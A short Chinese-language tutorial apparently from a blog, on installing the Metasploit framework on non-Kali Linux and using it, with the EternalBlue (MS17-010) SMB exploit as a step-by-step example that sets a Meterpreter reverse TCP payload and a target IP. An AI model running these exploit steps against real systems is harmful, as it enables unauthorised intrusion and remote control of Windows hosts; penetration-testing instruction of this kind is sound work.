Metasploit簡單使用——安裝和簡單使用
阿新 • • 發佈:2020-10-08
以下是非kali的Linux下安裝MSF框架
一鍵安裝
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall adduser msf #新增msf使用者 su msf #切換到msf使用者 cd /opt/metasploit-framework/bin #切換到msf所在的目錄 ./msfconsole #以後啟動msfconsole,都切換到msf使用者下啟動,這樣會同步資料庫。如果使用root使用者啟動的話,不會同步資料庫 也可以將msfconsole加入到執行目錄下,這樣在任何目錄直接msfconsole就可以了 ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole #備註: #初次執行msf會建立資料庫,但是msf預設使用的PostgreSQL資料庫不能與root使用者關聯,這也這也就是需要新建使用者msf來執行metasploit的原因所在。如果你一不小心手一抖,初次執行是在root使用者下,請使用 msfdb reinit 命令,然後使用非root使用者初始化資料庫。 MSF後期的升級:msfupdate
使用方法(永恆之藍為例):
-
進入框架:msfconsole
-
使用search命令查詢相關漏洞:searchms17-010
-
使用use進入模組:use exploit/windows/smb/ms17_010_eternalblue
-
使用info檢視模組資訊:info
-
設定攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp
-
檢視模組需要配置的引數:show options
-
設定引數:set RHOST 192.168.2.123(目標IP)
-
攻擊:exploit / run
-
後滲透階段